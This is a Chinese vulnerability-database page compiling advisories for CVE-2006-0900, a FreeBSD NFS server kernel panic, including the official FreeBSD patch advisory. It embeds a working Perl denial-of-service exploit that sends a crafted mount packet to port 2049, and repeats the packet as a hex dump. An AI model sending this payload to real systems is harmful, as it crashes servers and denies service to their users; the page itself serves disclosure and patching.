CVE-2006-0900
CVSS7.8
发布时间 :2006-02-27 14:06:00
修订时间 :2008-09-10 16:03:33
NMCOEPS    

[原文]nfsd in FreeBSD 6.0 kernel allows remote attackers to cause a denial of service via a crafted NFS mount request, as demonstrated by the ProtoVer NFS test suite.


[CNNVD]FreeBSD NFS服务器畸形mout请求远程拒绝服务漏洞(CNNVD-200602-407)

        FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码的Unix类系统。
        FreeBSD的NFS服务器实现在处理畸形用户请求时存在漏洞,远程攻击者可能利用此漏洞对操作系统执行拒绝服务攻击。
        NFS服务器的代码在处理一些通过TCP入站的RPC消息时存在空指标引用错误,如果收到了长度为0的畸形mount请求时会导致FreeBSD Kernel崩溃。

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0900
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0900
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-407
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/19017
(VENDOR_ADVISORY)  SECUNIA  19017
http://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.html
(UNKNOWN)  MLIST  [Dailydave] 20060226 fun with FreeBSD kernel
http://xforce.iss.net/xforce/xfdb/24918
(UNKNOWN)  XF  freebsd-nfsd-kernel-dos(24918)
http://www.securityfocus.com/bid/16838
(UNKNOWN)  BID  16838
http://www.osvdb.org/23511
(UNKNOWN)  OSVDB  23511
http://securityreason.com/securityalert/521
(UNKNOWN)  SREASON  521
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:10.nfs.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-06:10

- 漏洞信息

FreeBSD NFS服务器畸形mout请求远程拒绝服务漏洞
高危 其他
2006-02-27 00:00:00 2006-03-01 00:00:00
远程  
        FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码的Unix类系统。
        FreeBSD的NFS服务器实现在处理畸形用户请求时存在漏洞,远程攻击者可能利用此漏洞对操作系统执行拒绝服务攻击。
        NFS服务器的代码在处理一些通过TCP入站的RPC消息时存在空指标引用错误,如果收到了长度为0的畸形mount请求时会导致FreeBSD Kernel崩溃。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:10.nfs.asc

- 漏洞信息 (1540)

FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit (EDBID:1540)
bsd dos
2006-02-28 Verified
0 Evgeny Legerov
N/A [点击下载]
#!/usr/bin/perl
## Saw an advisory on Dailydave and wrote a little script to
## check my freebsd boxes (kind of evil). /str0ke (milw0rm.com)
##
## ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel.
## Evgeny Legerov
## www.gleg.net

use IO::Socket;

sub usage
{
    print "FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit\n";
    print "Advisory from Evgeny Legerov (www.gleg.net)\n";
    print "Code by str0ke (milw0rm.com)\n";
    print "Usage: $0 www.example.com\n";
    exit ();
}

my $host = shift || &usage;

my $printer = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00" .
              "\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x01" .
              "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" .
              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" .
              "\x2f\x74\x6d\x70";

$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "2049") || die "\n+ Connection failed...\n";
print $socket $printer . "\n";

# milw0rm.com [2006-02-28]
		

- 漏洞信息 (F44312)

FreeBSD-SA-06-10.nfs.txt (PacketStormID:F44312)
2006-03-03 00:00:00
Evgeny Legerov  freebsd.org
advisory,kernel,tcp
freebsd
CVE-2006-0900
[点击下载]

FreeBSD Security Advisory FreeBSD-SA-06:10.nfs - A part of the NFS server code charged with handling incoming RPC messages via TCP had an error which, when the server received a message with a zero-length payload, would cause a NULL pointer dereference which results in a kernel panic. The kernel will only process the RPC messages if a userland nfsd daemon is running.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-06:10.nfs                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Remote denial of service in NFS server

Category:       core
Module:         sys_nfsserver
Announced:      2006-03-01
Credits:        Evgeny Legerov
Affects:        All FreeBSD releases.
Corrected:      2006-03-01 14:18:11 UTC (RELENG_6, 6.1-PRERELEASE)
                2006-03-01 14:18:46 UTC (RELENG_6_0, 6.0-RELEASE-p5)
                2006-03-01 14:19:48 UTC (RELENG_5, 5.5-PRERELEASE)
                2006-03-01 14:21:01 UTC (RELENG_5_4, 5.4-RELEASE-p12)
                2006-03-01 14:24:52 UTC (RELENG_5_3, 5.3-RELEASE-p27)
                2006-03-01 14:21:56 UTC (RELENG_4, 4.11-STABLE)
                2006-03-01 14:22:30 UTC (RELENG_4_11, 4.11-RELEASE-p15)
                2006-03-01 14:23:07 UTC (RELENG_4_10, 4.10-RELEASE-p21)
CVE Name:       CVE-2006-0900

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
<URL:http://www.freebsd.org/security/>.

I.   Background

The Network File System (NFS) allows a host to export some or all of
its filesystems so that other hosts can access them over the network
and mount them as if they were on local disks.  NFS is built on top of
the Sun Remote Procedure Call (RPC) framework.

II.  Problem Description

A part of the NFS server code charged with handling incoming RPC
messages via TCP had an error which, when the server received a
message with a zero-length payload, would cause a NULL pointer
dereference which results in a kernel panic.  The kernel will only
process the RPC messages if a userland nfsd daemon is running.

III. Impact

The NULL pointer deference allows a remote attacker capable of sending
RPC messages to an affected FreeBSD system to crash the FreeBSD system.

IV.  Workaround

1) Disable the NFS server: set the nfs_server_enable variable to "NO"
   in /etc/rc.conf, and reboot.

   Alternatively, if there are no active NFS clients (as listed by the
   showmount(8) utility), simply killing the mountd and nfsd processes
   should suffice.

2) Add firewall rules to block RPC traffic to the NFS server from
   untrusted hosts.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 4-STABLE, 5-STABLE, or 6-STABLE,
or to the RELENG_6_0, RELENG_5_4, RELENG_5_3, RELENG_4_11, or
RELENG_4_10 security branch dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 4.10,
4.11, 5.3, 5.4, and 6.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 4.x]
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs4.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs4.patch.asc

[FreeBSD 5.x and 6.x]
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.freebsd.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch                                                           Revision
  Path
- -------------------------------------------------------------------------
RELENG_4
  src/sys/nfs/nfs_socket.c                                       1.60.2.7
RELENG_4_11
  src/UPDATING                                             1.73.2.91.2.16
  src/sys/conf/newvers.sh                                  1.44.2.39.2.19
  src/sys/nfs/nfs_socket.c                                   1.60.2.6.6.1
RELENG_4_10
  src/UPDATING                                             1.73.2.90.2.22
  src/sys/conf/newvers.sh                                  1.44.2.34.2.23
  src/sys/nfs/nfs_socket.c                                   1.60.2.6.4.1
RELENG_5
  src/sys/nfsserver/nfs_srvsock.c                                1.92.2.2
RELENG_5_4
  src/UPDATING                                            1.342.2.24.2.21
  src/sys/conf/newvers.sh                                  1.62.2.18.2.17
  src/sys/nfsserver/nfs_srvsock.c                            1.92.2.1.2.1
RELENG_5_3
  src/UPDATING                                            1.342.2.13.2.30
  src/sys/conf/newvers.sh                                  1.62.2.15.2.32
  src/sys/nfsserver/nfs_srvsock.c                                1.92.4.1
RELENG_6
  src/sys/nfsserver/nfs_srvsock.c                                1.94.2.1
RELENG_6_0
  src/UPDATING                                             1.416.2.3.2.10
  src/sys/conf/newvers.sh                                    1.69.2.8.2.6
  src/sys/nfsserver/nfs_srvsock.c                                1.94.4.1
- -------------------------------------------------------------------------

VII. References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0900

The latest revision of this advisory is available at
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:10.nfs.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFEBbOIFdaIBMps37IRAgmUAJ0fYEjr1gk8KpHGbcmhpPwh+GqI3ACcDH5X
dN3ngWsO1Z91GdTjJe0e7VE=
=GCDX
-----END PGP SIGNATURE-----
    

- 漏洞信息

23511
FreeBSD nfsd Malformed NFS Mount Request Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

FreeBSD contains a flaw that may allow a remote denial of service. The issue is triggered when a malformed mount request is received, and will result in loss of availability for the platform.

- 时间线

2006-02-26 Unknow
2006-02-26 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

FreeBSD Remote NFS RPC Request Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 16838
Yes No
2006-02-27 12:00:00 2006-03-04 04:16:00
Evgeny Legerov discovered this issue.

- 受影响的程序版本

FreeBSD FreeBSD 6.0 -STABLE
FreeBSD FreeBSD 6.0 -RELEASE
FreeBSD FreeBSD 5.4 -RELENG
FreeBSD FreeBSD 5.4 -RELEASE
FreeBSD FreeBSD 5.4 -PRERELEASE
FreeBSD FreeBSD 5.3 -STABLE
FreeBSD FreeBSD 5.3 -RELENG
FreeBSD FreeBSD 5.3 -RELEASE
FreeBSD FreeBSD 5.3
FreeBSD FreeBSD 4.11 -STABLE
FreeBSD FreeBSD 4.11 -RELENG
FreeBSD FreeBSD 4.11 -RELEASE-p3
FreeBSD FreeBSD 4.10 -RELENG
FreeBSD FreeBSD 4.10 -RELEASE-p8
FreeBSD FreeBSD 4.10 -RELEASE
FreeBSD FreeBSD 4.10
FreeBSD FreeBSD 5.4-STABLE
FreeBSD FreeBSD 4.10-PRERELEASE

- 漏洞讨论

FreeBSD is susceptible to a remote denial-of-service vulnerability. This issue is due to a flaw in affected versions of the kernel that potentially results in a crash when handling malformed RPC messages through TCP.

This issue allows remote attackers to cause affected systems to crash, denying further network service to legitimate users.

- 漏洞利用

This issue was discovered by the ProtoVer NFS testsuite 1.0 package, and can be reproduced by it.

The following packet data hex dump is sufficient to crash an affected kernel:

80 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02
00 01 86 a5 00 00 00 01 00 00 00 01 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04
2f 74 6d 70

- 解决方案


FreeBSD has released advisory FreeBSD-SA-06:10.nfs including fixes to address this issue. Please see the referenced advisory for more information.


FreeBSD FreeBSD 5.4-STABLE

FreeBSD FreeBSD 4.10 -RELENG

FreeBSD FreeBSD 4.10 -RELEASE-p8

FreeBSD FreeBSD 4.10

FreeBSD FreeBSD 4.10 -RELEASE

FreeBSD FreeBSD 4.11 -RELEASE-p3

FreeBSD FreeBSD 4.11 -RELENG

FreeBSD FreeBSD 4.11 -STABLE

FreeBSD FreeBSD 5.3 -RELEASE

FreeBSD FreeBSD 5.3 -RELENG

FreeBSD FreeBSD 5.3

FreeBSD FreeBSD 5.3 -STABLE

FreeBSD FreeBSD 5.4 -PRERELEASE

FreeBSD FreeBSD 5.4 -RELEASE

FreeBSD FreeBSD 5.4 -RELENG

FreeBSD FreeBSD 6.0 -RELEASE

FreeBSD FreeBSD 6.0 -STABLE

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站